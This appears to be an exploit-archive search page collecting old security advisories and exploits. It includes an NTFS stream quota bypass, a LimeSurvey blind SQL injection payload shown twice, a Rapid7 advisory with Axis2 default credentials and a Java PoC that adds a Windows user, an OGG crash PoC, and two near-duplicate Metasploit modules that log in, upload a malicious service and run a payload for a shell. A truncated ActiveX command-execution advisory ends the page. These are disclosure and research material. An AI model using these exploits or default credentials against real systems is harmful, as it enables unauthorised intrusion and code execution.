0037
Search result for '0037'
(0.0755739212036 seconds)
Delphis Security Team/DST2K0037.txt ( na)
============================================================================
Delphis Consulting Plc
============================================================================
Security Team Advisories
[25/09/2000]
securityteam@delphisplc.com
[http://www.delphisplc.com/thinking/whitepapers/]
============================================================================
Adv : DST2K0037
Title : QuotaAdvisor 4.1 by WQuinn is susceptible to alternative
data streams to bypass quotas.
Author : DCIST (securityteam@delphisplc.com)
O/S : Microsoft Windows NT 4 Server (SP5)
Product : QuotaAdvisor 4.1 (Build 450)
Date : 25/09/2000
I. Description
II. Solution
III. Disclaimer
============================================================================
I. Description
============================================================================
Vendor URL: http://www.wquinn.com/
Delphis Consulting Internet Security Team (DCIST) discovered the following
vulnerability in QuotaAdvisor under Windows NT.
Severity: medium - Bypassing quotas
It is possible to bypass the quotas imposed by QuotaAdvisor by utilising
data streams alternative to the default.
example: cat e:\45mbfile.doc > 0mbfile.doc:hidden
This would enable a 45mb file to appear as if the user is not utilising
their
quota. CAT was taken from the NT Resource KIT.
Explorer & WQuinns space monitor shows the file as 0bytes although the total
amount of free disk space availible does decrease.
example screen log:
I:\quota>copy C:\45mbfile.doc .\
There is not enough space on the disk.
0 file(s) copied.
I:\quota>cat C:\45mbfile.doc > .\0mbfile.doc:hidden
I:\quota>.\streams .\
.\0mbfile.doc
45698829 :hidden:$DATA
I:\quota>dir hello.exe
Volume in drive I has no label.
Volume Serial Number is C0FA-B4DF
Directory of I:\quota
09/25/2000 05:49p 0 0mbfile.doc
1 File(s) 0 bytes
0 Dir(s) 1,841,468,928 bytes free
II. Solution
============================================================================
Vendor Status: Informed
Currently there us no known solution to this problem. The following are
the vendors comments in response to our advisory:
"This is a known issue based on a design choice to ignore streams.
We plan in the future to support them."
III. Disclaimer
============================================================================
THE INFORMATION CONTAINED IN THIS ADVISORY IS BELIEVED TO BE ACCURATE AT
THE TIME OF PRINTING, BUT NO REPRESENTATION OR WARRANTY IS GIVEN, EXPRESS OR
IMPLIED, AS TO ITS ACCURACY OR COMPLETENESS. NEITHER THE AUTHOR NOR THE
PUBLISHER ACCEPTS ANY LIABILITY WHATSOEVER FOR ANY DIRECT, INDIRECT OR
CONSEQUENTIAL LOSS OR DAMAGE ARISING IN ANY WAY FROM ANY USE OF, OR RELIANCE
PLACED ON, THIS INFORMATION FOR ANY PURPOSE.
============================================================================
This e-mail and any files transmitted with it are intended solely for the
addressee and are confidential. They may also be legally
privileged.Copyright in them is reserved by Delphis Consulting PLC
["Delphis"] and they must not be disclosed to, or used by, anyone other than
the addressee.If you have received this e-mail and any accompanying files in
error, you may not copy, publish or use them in any way and you should
delete them from your system and notify us immediately.E-mails are not
secure. Delphis does not accept responsibility for changes to e-mails that
occur after they have been sent. Any opinions expressed in this e-mail may
be personal to the author and may not necessarily reflect the opinions of
Delphis
Delphis Consulting Plc Security Team Advisory DST2K0037 - It is possible to bypass the quotas imposed by QuotaAdvisor by utilizing data streams alternative to the default.
TorTukiTu/Limesurvey (PHPSurveyor v.1.91+ stable) Blind SQL Injection ( php)
# Exploit Title: LimeSurvey Blind SQL injection
# Date: 20/02/2012
# Author: TorTukiTu - OpenSphere
# Version: 1.91+ build 11804
# Tested on: php
{cke_protected}{C}{cke_protected}{C}
-------------------------------------------------------------------------
# TorTukiTu - Killing Tortoise
# ,-"""-.
# oo._/ \___/ \
# (____)_/___\__\_)
# /_// \\_\
#
# Cookie hacking + Blind SQL Injection
# The vulnerability occurs when a user answers a survey (index.php).
# The session variables can be freely hacked using the following lines in save.php l.82 :
# if (isset($_POST[$pf])) {$_SESSION[$pf] = $_POST[$pf];}
# if (!isset($_POST[$pf])) {$_SESSION[$pf] = "";}
# $pf is user input in the POST variable
# once splitted, SQL request is directly build from those sessions variable by function createinsertquery(),
# if a special Post variable 'srid' is set both in the variable
# 'fieldnames' and as simple POST variable (query l. 715 save.php).
# The user can realize blind SQL injections with specially crafted POST variables.
# Normal POST variables example:
fieldnames=17165X6X18SQ001%7C17165X6X18SQ002%7C17165X6X18SQ003%7C17165X6X18SQ004%7C17165X6X18SQ005%7C17165X6X18SQ006%7C17165X6X18SQ007%7C17165X6X18other%7C17165X6X26SQ001%7C17165X6X26SQ002%7C17165X6X26SQ003
MULTI17165X6X18=8
tbdisp17...
...
start_time=1329742665
# Craft POST variables like this :
fieldnames=17165X6X18SQ001%7C17165X6X18SQ002%7C17165X6X18SQ003%7C17165X6X18SQ004%7C17165X6X18SQ005%7C17165X6X18SQ006%7C17165X6X18SQ007%7C17165X6X18other%7C17165X6X26SQ001%7C17165X6X26SQ002%7C17165X6X26SQ003%7C[VALID FIELD ID]` = [SQL INJECTION]--%7Csrid
MULTI17165X6X18=8
tbdisp17...
...
start_time=1329742665
srid=[SOME INTEGER]
#Example : Blind SQL user name guessing :
fieldnames=17165X6X18SQ001%7C17165X6X18SQ002%7C17165X6X18SQ003%7C17165X6X18SQ004%7C17165X6X18SQ005%7C17165X6X18SQ006%7C17165X6X18SQ007%7C17165X6X18other%7C17165X6X26SQ001%7C17165X6X26SQ002%7C17165X6X26SQ003%7C17165X6X18SQ001` = NULL WHERE id=6 AND id IN ( SELECT IF ( (SELECT SUBSTRING(users_name,1) FROM lime_users WHERE uid=1) LIKE 'a%', 1, SLEEP(5)))--%7Csrid
MULTI17165X6X18=8
tbdisp17...
...
start_time=1329742665
srid=42
-------------------------------------------------------------------------
TorTukiTu/Limesurvey Blind SQL Injection ( na)
# Exploit Title: LimeSurvey Blind SQL injection
# Date: 20/02/2012
# Author: TorTukiTu - OpenSphere
# Version: 1.91+ build 11804
# Tested on: php
{cke_protected}{C}{cke_protected}{C}
-------------------------------------------------------------------------
# TorTukiTu - Killing Tortoise
# ,-"""-.
# oo._/ \___/ \
# (____)_/___\__\_)
# /_// \\_\
#
# Cookie hacking + Blind SQL Injection
# The vulnerability occurs when a user answers a survey (index.php).
# The session variables can be freely hacked using the following lines in save.php l.82 :
# if (isset($_POST[$pf])) {$_SESSION[$pf] = $_POST[$pf];}
# if (!isset($_POST[$pf])) {$_SESSION[$pf] = "";}
# $pf is user input in the POST variable
# once splitted, SQL request is directly build from those sessions variable by function createinsertquery(),
# if a special Post variable 'srid' is set both in the variable
# 'fieldnames' and as simple POST variable (query l. 715 save.php).
# The user can realize blind SQL injections with specially crafted POST variables.
# Normal POST variables example:
fieldnames=17165X6X18SQ001%7C17165X6X18SQ002%7C17165X6X18SQ003%7C17165X6X18SQ004%7C17165X6X18SQ005%7C17165X6X18SQ006%7C17165X6X18SQ007%7C17165X6X18other%7C17165X6X26SQ001%7C17165X6X26SQ002%7C17165X6X26SQ003
MULTI17165X6X18=8
tbdisp17...
...
start_time=1329742665
# Craft POST variables like this :
fieldnames=17165X6X18SQ001%7C17165X6X18SQ002%7C17165X6X18SQ003%7C17165X6X18SQ004%7C17165X6X18SQ005%7C17165X6X18SQ006%7C17165X6X18SQ007%7C17165X6X18other%7C17165X6X26SQ001%7C17165X6X26SQ002%7C17165X6X26SQ003%7C[VALID FIELD ID]` = [SQL INJECTION]--%7Csrid
MULTI17165X6X18=8
tbdisp17...
...
start_time=1329742665
srid=[SOME INTEGER]
#Example : Blind SQL user name guessing :
fieldnames=17165X6X18SQ001%7C17165X6X18SQ002%7C17165X6X18SQ003%7C17165X6X18SQ004%7C17165X6X18SQ005%7C17165X6X18SQ006%7C17165X6X18SQ007%7C17165X6X18other%7C17165X6X26SQ001%7C17165X6X26SQ002%7C17165X6X26SQ003%7C17165X6X18SQ001` = NULL WHERE id=6 AND id IN ( SELECT IF ( (SELECT SUBSTRING(users_name,1) FROM lime_users WHERE uid=1) LIKE 'a%', 1, SLEEP(5)))--%7Csrid
MULTI17165X6X18=8
tbdisp17...
...
start_time=1329742665
srid=42
-------------------------------------------------------------------------
Limesurvey version 1.91+ build 11804 suffers from a remote blind SQL injection vulnerability.
H D Moore/Rapid7 Security Advisory 37 ( na)
R7-0037: SAP BusinessObjects Axis2 Default Admin Password
October 13th, 2010
Description:
The SAP BusinessObjects product contains a module (dswsbobje.war) which
deploys Axis2 with an administrator account which is configured with a
static password. As a result, anyone with access to the Axis2 port can
gain full access to the machine via arbitrary remote code execution.
This requires the attacker to upload a malicious web service and to
restart the instance of Tomcat. This issue may apply to other products
and vendors that embed the Axis2 component. The username is "admin" and
the password is "axis2", this is also the default for standalone Axis2
installations.
Impact:
An attacker can execute arbitrary code by creating a malicious web
service (jar). The attacker can log in to the Axis2 component with the
default admin account, upload the malicious web service, and upon
restart the malicious code will be executed.
Proof of Concept Code:
Create a webservice (jar) which contains malicious code. Login to Axis2
and upload the web service. Restart Tomcat and the malicious code will
execute once Axis2 is loaded.
package org.apache.axis2.axis2userguide; import java.io.IOException;
public class AddUser {
public AddUser() {
Process process;
try {
process = Runtime.getRuntime().exec("net user foo bar /add");
}
catch(IOException ioexception) {
ioexception.printStackTrace();
}
}
public void main() {
return;
}
}
CVE: CVE-2010-0219
Vendor Response:
A fix has been provided on the SAP customer support site: SAP Security
Note 1432881. Please note that this site requires authentication.
References:
http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf
http://www.kb.cert.org/vuls/id/989719
Disclosure Timeline:
2010-08-12 - Vulnerability reported to the vendor via email
2010-08-12 - Vendor confirmed the vulnerability
2010-09-02 - Vulnerability reported to CERT
2010-10-13 - Coordinated public release of advisory
Credit:
This vulnerability was reported by Joshua Abraham and Will Vandevanter.
About Rapid7 Security:
Rapid7 provides vulnerability management, compliance and penetration
testing solutions for Web application, network and database security. In
addition to developing the NeXpose Vulnerability Management system,
Rapid7 manages the Metasploit Project and is the primary sponsor of the
W3AF web assessment tool.
Our vulnerability disclosure policy is available online at:
http://www.rapid7.com/disclosure.jsp
Rapid7 Security Advisory - The SAP BusinessObjects product contains a module (dswsbobje.war) which deploys Axis2 with an administrator account which is configured with a static password. As a result, anyone with access to the Axis2 port can gain full access to the machine via arbitrary remote code execution. This requires the attacker to upload a malicious web service and to restart the instance of Tomcat. This issue may apply to other products and vendors that embed the Axis2 component. The username is "admin" and the password is "axis2", this is also the default for standalone Axis2 installations.
Praveen Darshanam/Xilisoft Video Converter Wizard 3 OGG Denial Of Service ( na)
ModLoad: 5b860000 5b8b4000 C:\WINDOWS\system32\NETAPI32.dll
ModLoad: 769c0000 76a73000 C:\WINDOWS\system32\USERENV.dll
(26c8.1818): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=019dc690 ecx=00000000 edx=00000000 esi=0199ffb0 edi=0199fe20
eip=0036a9ba esp=0012d864 ebp=0037b3e0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
*** WARNING: Unable to verify checksum for C:\Program Files\Xilisoft\Video Converter 3\avformat.dll
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\Xilisoft\Video Converter 3\avformat.dll -
avformat!yuv4mpeg_init+0x6e06:
0036a9ba 8a6811 mov ch,byte ptr [eax+11h] ds:0023:00000011=??
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:000> g
(26c8.1818): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=019dc690 ecx=00000000 edx=00000000 esi=0199ffb0 edi=0199fe20
eip=0036a9ba esp=0012d864 ebp=0037b3e0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
avformat!yuv4mpeg_init+0x6e06:
0036a9ba 8a6811 mov ch,byte ptr [eax+11h] ds:0023:00000011=??
0:000> kv
ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
0012d860 003540ea 0012d8a0 0199ffb0 0012d8a0 avformat!yuv4mpeg_init+0x6e06
00000000 00000000 00000000 00000000 00000000 avformat!nut_init+0x42a
0:000> d eip
0036a9ba 8a 68 11 8a 50 0f 8a 48-10 c1 e1 08 0b ca 33 d2 .h..P..H......3.
0036a9ca 8a 50 0e c1 e1 08 0b ca-8b c1 c3 90 90 90 90 90 .P..............
0036a9da 90 90 90 90 90 90 8b 44-24 04 33 c9 33 d2 8b 00 .......D$.3.3...
0036a9ea 8a 68 15 8a 50 13 8a 48-14 c1 e1 08 0b ca 33 d2 .h..P..H......3.
0036a9fa 8a 50 12 c1 e1 08 0b ca-8b c1 c3 90 90 90 90 90 .P..............
0036aa0a 90 90 90 90 90 90 56 8b-74 24 08 85 f6 74 54 57 ......V.t$...tTW
0036aa1a b9 5a 00 00 00 33 c0 8b-fe f3 ab 68 00 40 00 00 .Z...3.....h.@..
0036aa2a c7 46 04 00 40 00 00 e8-18 11 00 00 68 00 10 00 .F..@.......h...
################PoC Start##############################################
print "\nXilisoft Video Converter Wizard 3 ogg file processing DoS"
#Download from
# http://www.downloadatoz.com/xilisoft-video-converter/order.php?download=xilisoft-video-converter&url=downloadatoz.com/xilisoft-video-converter/wizard.html/__xilisoft-video-converter__d1
#http://www.downloadatoz.com/xilisoft-video-converter/wizard.html
buff = "D" * 8400
try:
oggfile = open("XilVC_ogg_crash.ogg","w")
oggfile.write(buff)
oggfile.close()
print "[+]Successfully created ogg file\n"
print "[+]Coded by Praveen Darshanam\n"
except:
print "[+]Cannot create File\n"
################PoC End################################################
Xilisoft Video Converter Wizard version 3 suffers from a denial of service vulnerability when processing .ogg files.
metasploit/Axis2 Authenticated Code Execution (via REST) ( multiple)
##
# $Id: axis2_deployer_rest.rb 11330 2010-12-14 17:26:44Z egypt $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Axis2 Authenticated Code Execution (via REST)',
'Version' => '$Revision: 11330 $',
'Description' => %q{
This module logs in to an Axis2 Web Admin Module instance using a specific user/pass
and uploads and executes commands via deploying a malicious web service by using REST.
},
'References' =>
[
# General
[ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ],
[ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ],
[ 'CVE', '2010-0219' ],
],
'Platform' => [ 'java', 'win', 'linux' ], # others?
'Targets' =>
[
[ 'Java', {
'Arch' => ARCH_JAVA,
'Platform' => 'java'
},
],
#
# Platform specific targets only
#
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
},
],
[ 'Linux X86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
],
],
'Author' => [ 'Joshua Abraham <jabra[at]rapid7.com>' ],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(8080),
OptString.new('USERNAME', [ false, 'The username to authenticate as','admin' ]),
OptString.new('PASSWORD', [ false, 'The password for the specified username','axis2' ]),
OptString.new('PATH', [ true, "The URI path of the axis2 app", '/axis2'])
], self.class)
register_autofilter_ports([ 8080 ])
end
def upload_exec(session)
contents=''
name = Rex::Text.rand_text_alpha(8)
services_xml = %Q{
<service name="#{name}" scope="application">
<description>
#{Rex::Text.rand_text_alphanumeric(50 + rand(50))}
</description>
<messageReceivers>
<messageReceiver
mep="http://www.w3.org/2004/08/wsdl/in-only"
class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/>
<messageReceiver
mep="http://www.w3.org/2004/08/wsdl/in-out"
class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
</messageReceivers>
<parameter name="ServiceClass">
metasploit.PayloadServlet
</parameter>
</service>
}
if target.name =~ /Java/
zip = payload.encoded_jar
zip.add_file("META-INF/services.xml", services_xml)
# We need this class as a wrapper to run in a thread. For some reason
# the Payload class is giving illegal access exceptions without it.
path = File.join(Msf::Config.install_root, "data", "java", "metasploit", "PayloadServlet.class")
fd = File.open(path, "rb")
servlet = fd.read(fd.stat.size)
fd.close
zip.add_file("metasploit/PayloadServlet.class", servlet)
contents = zip.pack
else
end
boundary = rand_text_alphanumeric(6)
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"filename\"; "
data << "filename=\"#{name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n"
data << contents
data << "\r\n--#{boundary}--"
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/axis2-admin/upload",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Content-Length' => data.length,
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
if (res and res.code == 200)
print_status("Successfully uploaded")
else
print_error("Error uploading #{res}")
return
end
=begin
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp",
'method' => 'GET',
'headers' =>
{
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
puts res.body
puts res.code
if res.code > 200 and res.code < 300
if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) )
dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\"
puts dir
else
if ( a.scan(/catalina\.home<\/th><td style=".*">(.*) <\/td>/i) )
dir = $1 + "/webapps/dswsbobje/WEB-INF/services/"
puts dir
end
end
end
=end
print_status("Polling to see if the service is ready")
# Try to execute the payload
1.upto 5 do
Rex::ThreadSafe.sleep(3)
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/services/#{name}/run",
'method' => 'GET',
'headers' =>
{
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
if res.code >= 200 and res.code < 300
# This should usually mean we got a shell
break
end
end
end
def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']
path = datastore['PATH']
success = false
srvhdr = '?'
begin
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/#{path}/axis2-admin/login",
'ctype' => 'application/x-www-form-urlencoded',
'data' => "userName=#{user}&password=#{pass}&submit=+Login+",
}, 25)
if not (res.kind_of? Rex::Proto::Http::Response)
raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin not responding")
end
if res.code == 404
raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin returned code 404")
end
srvhdr = res.headers['Server']
if res.code == 200
# Could go with res.headers["Server"] =~ /Apache-Coyote/i
# as well but that seems like an element someone's more
# likely to change
success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1)
if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/)
session = $1
end
end
rescue ::Rex::ConnectionError
print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin Unable to attempt authentication")
end
if success
print_good("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] successful login '#{user}' : '#{pass}'")
upload_exec(session)
else
print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] failed to login as '#{user}'")
end
end
end
Joshua D. Abraham/Axis2 Upload Exec (via REST) ( na)
##
# $Id: axis2_deployer_rest.rb 11178 2010-11-30 18:17:33Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit
Rank = ExcellentRanking
HttpFingerprint = { :pattern => [ /Apache.*(Coyote|Tomcat)/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Axis2 Upload Exec (via REST)',
'Version' => '$Revision: 11178 $',
'Description' => %q{
This module logs in to an Axis2 Web Admin Module instance using a specific user/pass
and uploads and executes commands via deploying a malicious web service by using REST.
},
'References' =>
[
# General
[ 'URL', 'http://www.rapid7.com/security-center/advisories/R7-0037.jsp' ],
[ 'URL', 'http://spl0it.org/files/talks/source_barcelona10/Hacking%20SAP%20BusinessObjects.pdf' ],
[ 'CVE', '2010-0219' ],
],
'Platform' => [ 'java', 'win', 'linux' ], # others?
'Targets' =>
[
[ 'Java', {
'Arch' => ARCH_JAVA,
'Platform' => 'java'
},
],
#
# Platform specific targets only
#
[ 'Windows Universal',
{
'Arch' => ARCH_X86,
'Platform' => 'win'
},
],
[ 'Linux X86',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
},
],
],
'Author' => [ 'Joshua Abraham <jabra[at]rapid7.com>' ],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(8080),
OptString.new('USERNAME', [ false, 'The username to authenticate as','admin' ]),
OptString.new('PASSWORD', [ false, 'The password for the specified username','axis2' ]),
OptString.new('PATH', [ true, "The URI path of the axis2 app", '/axis2'])
], self.class)
register_autofilter_ports([ 8080 ])
end
def upload_exec(session)
contents=''
name = Rex::Text.rand_text_alpha(8)
services_xml = %Q{
<service name="#{name}" scope="application">
<description>
#{Rex::Text.rand_text_alphanumeric(50 + rand(50))}
</description>
<messageReceivers>
<messageReceiver
mep="http://www.w3.org/2004/08/wsdl/in-only"
class="org.apache.axis2.rpc.receivers.RPCInOnlyMessageReceiver"/>
<messageReceiver
mep="http://www.w3.org/2004/08/wsdl/in-out"
class="org.apache.axis2.rpc.receivers.RPCMessageReceiver"/>
</messageReceivers>
<parameter name="ServiceClass">
metasploit.PayloadServlet
</parameter>
</service>
}
if target.name =~ /Java/
zip = payload.encoded_jar
zip.add_file("META-INF/services.xml", services_xml)
# We need this class as a wrapper to run in a thread. For some reason
# the Payload class is giving illegal access exceptions without it.
path = File.join(Msf::Config.install_root, "data", "java", "metasploit", "PayloadServlet.class")
fd = File.open(path, "rb")
servlet = fd.read(fd.stat.size)
fd.close
zip.add_file("metasploit/PayloadServlet.class", servlet)
contents = zip.pack
else
end
boundary = rand_text_alphanumeric(6)
data = "--#{boundary}\r\nContent-Disposition: form-data; name=\"filename\"; "
data << "filename=\"#{name}.jar\"\r\nContent-Type: application/java-archive\r\n\r\n"
data << contents
data << "\r\n--#{boundary}--"
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/axis2-admin/upload",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'multipart/form-data; boundary=' + boundary,
'Content-Length' => data.length,
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
if (res and res.code == 200)
print_status("Successfully uploaded")
else
print_error("Error uploading #{res}")
return
end
=begin
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/axis2-web/HappyAxis.jsp",
'method' => 'GET',
'headers' =>
{
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
puts res.body
puts res.code
if res.code > 200 and res.code < 300
if ( res.body.scan(/([A-Z] \Program Files\Apache Software Foundation\Tomcat \d.\d)/i) )
dir = $1.sub(/: /,':') + "\\webapps\\dswsbobje\\WEB-INF\\services\\"
puts dir
else
if ( a.scan(/catalina\.home<\/th><td style=".*">(.*)&nbsp;<\/td>/i) )
dir = $1 + "/webapps/dswsbobje/WEB-INF/services/"
puts dir
end
end
end
=end
print_status("Polling to see if the service is ready")
# Try to execute the payload
1.upto 5 do
Rex::ThreadSafe.sleep(3)
res = send_request_raw({
'uri' => "/#{datastore['PATH']}/services/#{name}/run",
'method' => 'GET',
'headers' =>
{
'Cookie' => "JSESSIONID=#{session}",
}
}, 25)
if res.code >= 200 and res.code < 300
# This should usually mean we got a shell
break
end
end
end
def exploit
user = datastore['USERNAME']
pass = datastore['PASSWORD']
path = datastore['PATH']
success = false
srvhdr = '?'
begin
res = send_request_cgi(
{
'method' => 'POST',
'uri' => "/#{path}/axis2-admin/login",
'ctype' => 'application/x-www-form-urlencoded',
'data' => "userName=#{user}&password=#{pass}&submit=+Login+",
}, 25)
if not (res.kind_of? Rex::Proto::Http::Response)
raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin not responding")
end
if res.code == 404
raise RuntimeError.new("http://#{rhost}:#{rport}/#{path}/axis2-admin returned code 404")
end
srvhdr = res.headers['Server']
if res.code == 200
# Could go with res.headers["Server"] =~ /Apache-Coyote/i
# as well but that seems like an element someone's more
# likely to change
success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1)
if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/)
session = $1
end
end
rescue ::Rex::ConnectionError
print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin Unable to attempt authentication")
end
if success
print_good("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] successful login '#{user}' : '#{pass}'")
upload_exec(session)
else
print_error("http://#{rhost}:#{rport}/#{path}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] failed to login as '#{user}'")
end
end
end
This Metasploit module logs in to an Axis2 Web Admin Module instance using a specific user/pass and uploads and executes commands via deploying a malicious web service by using REST.
rgod/RealNetworks RealGames StubbyUtil.ShellCtl.1 ActiveX Control Multiple Remote Command Execution ( windows)
RealNetworks RealGames StubbyUtil.ShellCtl.1 ActiveX Control
(InstallerDlg.dll v2.6.0.445) Multiple Remote Commands Execution
and Code Execution Vulnerabilities
tested against Internet Explorer 9, Vista sp2
download url: http://www.gamehouse.com/
background:
When choosing to play with theese online games ex. the game called
"My Farm Life" (see url: http://www.gamehouse.com/download-games/my-farm-life )
you download an installer called GameHouse-Installer_am-myfarmlife_gamehouse_.exe
This setup program installs an ActiveX with the following settings:
CLSID: {80AB3FB6-9660-416C-BE8D-0E2E8AC3138B}
Progid: StubbyUtil.ShellCtl.1
Binary Path: C:\Program Files\RealArcade\Installer\bin\InstallerDlg.dll
Safe For Initialization (Registry): True
Safe For Scripting (Registry): True
This control is safe for scripting and safe for initialization,
so Internet Explorer will allow scripting of this control from
remote.
vulnerability:
This control has four methods implemented insecurely:
ShellExec() -> allows to launch arbitrary commands
ShellExecRunAs() -> allows to launch arbitrary commands
CreateShortcut() -> allows to create arbitrary executable files inside the automatic
startup folders
CopyDocument() -> allows to copy arbitrary executable files from a remote
network share to local folders, ex. automatic startup folders
other attacks are possible including information disclosure and file deletion,
see typelib:
class IShellCtl { /* GUID={0D60A064-2009-4623-8FC1-F99CAC01037E} */
/* DISPID=1610612736 */
function QueryInterface(
/* VT_PTR [26] [in] --> ? [29] */ &$riid,
/* VT_PTR [26] [out] --> VT_PTR [26] */ &$ppvObj
)
{
}
/* DISPID=1610612737 */
/* VT_UI4 [19] */
function AddRef(
)
{
}
/* DISPID=1610612738 */
/* VT_UI4 [19] */
function Release(
)
{
}
/* DISPID=1610678272 */
function GetTypeInfoCount(
/* VT_PTR [26] [out] --> VT_UINT [23] */ &$pctinfo
)
{
}
/* DISPID=1610678273 */
function GetTypeInfo(
/* VT_UINT [23] [in] */ $itinfo,
/* VT_UI4 [19] [in] */ $lcid,
/* VT_PTR [26] [out] --> VT_PTR [26] */ &$pptinfo
)
{
}
/* DISPID=1610678274 */
function GetIDsOfNames(
/* VT_PTR [26] [in] --> ? [29] */ &$riid,
/* VT_PTR [26] [in] --> VT_PTR [26] */ &$rgszNames,
/* VT_UINT [23] [in] */ $cNames,
/* VT_UI4 [19] [in] */ $lcid,
/* VT_PTR [26] [out] --> VT_I4 [3] */ &$rgdispid
)
{
}
/* DISPID=1610678275 */
function Invoke(
/* VT_I4 [3] [in] */ $dispidMember,
/* VT_PTR [26] [in] --> ? [29] */ &$riid,
/* VT_UI4 [19] [in] */ $lcid,
/* VT_UI2 [18] [in] */ $wFlags,
/* VT_PTR [26] [in] --> ? [29] */ &$pdispparams,
/* VT_PTR [26] [out] --> VT_VARIANT [12] */ &$pvarResult,
/* VT_PTR [26] [out] --> ? [29] */ &$pexcepinfo,
/* VT_PTR [26] [out] --> VT_UINT [23] */ &$puArgErr
)
{
}
/* DISPID=1 */
function CreateShortcut(
/* VT_PTR [26] [in] --> VT_BSTR [8] */ &$name,
/* VT_PTR [26] [in] --> VT_BSTR [8] */ &$target,
/* VT_PTR [26] [in] --> VT_BSTR [8] */ &$icon,
/* VT_PTR [26] [in] --> VT_BSTR [8] */ &$workingDir,
/* VT_PTR [26] [in] --> VT_BSTR [8] */ &$args
)
{
/* method CreateShortcut */
}
/* DISPID=2 */
function DeleteShortcut(
/* VT_PTR [26] [in] --> VT_BSTR [8] */ &$name
)
{
/* method DeleteShortcut */
}
/* DISPID=3 */
/* VT_BSTR [8] */
function ModuleFileName(
)
{
/* method ModuleFileName */
}
/* DISPID=4 */
/* VT_BSTR [8] */
function GetSpecialFolder(
/* VT_UI4 [19] [in] */ $__MIDL_0025
)
{
/* method GetSpecialFolder */
}
/* DISPID=5 */
/* VT_BOOL [11] */
function CheckWnd(
/* VT_PTR [26] [in] --> VT_BSTR [8] */ &$__MIDL_0026
)
{
/* method CheckWnd */
}
/* DISPID=6 */
/* VT_BSTR [8] */
function ExistingTPS(
/* VT_PTR [26] [in] --> VT_BSTR [8] */ &$__MIDL_0028
)
{
/* method ExistingTPS */
}
/* DISPID=7 */
function SetWorkingDir(
/* VT_PTR [26] [in] --> VT_BSTR [8] */ &$__MIDL_0030
)
{
/* method SetWorkingDir */
}
/* DISPID=8 */
/* VT_BSTR [8] */
function GetWorkingDir(
)
{
/* method GetWorkingDir */
}
/* DISPID=9 */
/* VT_R8 [5] */
function OSVersion(
)
{
/* method OSVersion */
}
/* DISPID=10 */
/* VT_BSTR [8] */
function GetSystemID(
)
{
/* method GetSystemID */
}
/* DISPID=11 */
function InstallFromCD(
/* VT_BSTR [8] [in] */ $GameID,
/* VT_BSTR [8] [in] */ $GameName,
/* VT_BSTR [8] [in] */ $Tps,
/* VT_BSTR [8] [in] */ $GameLang,
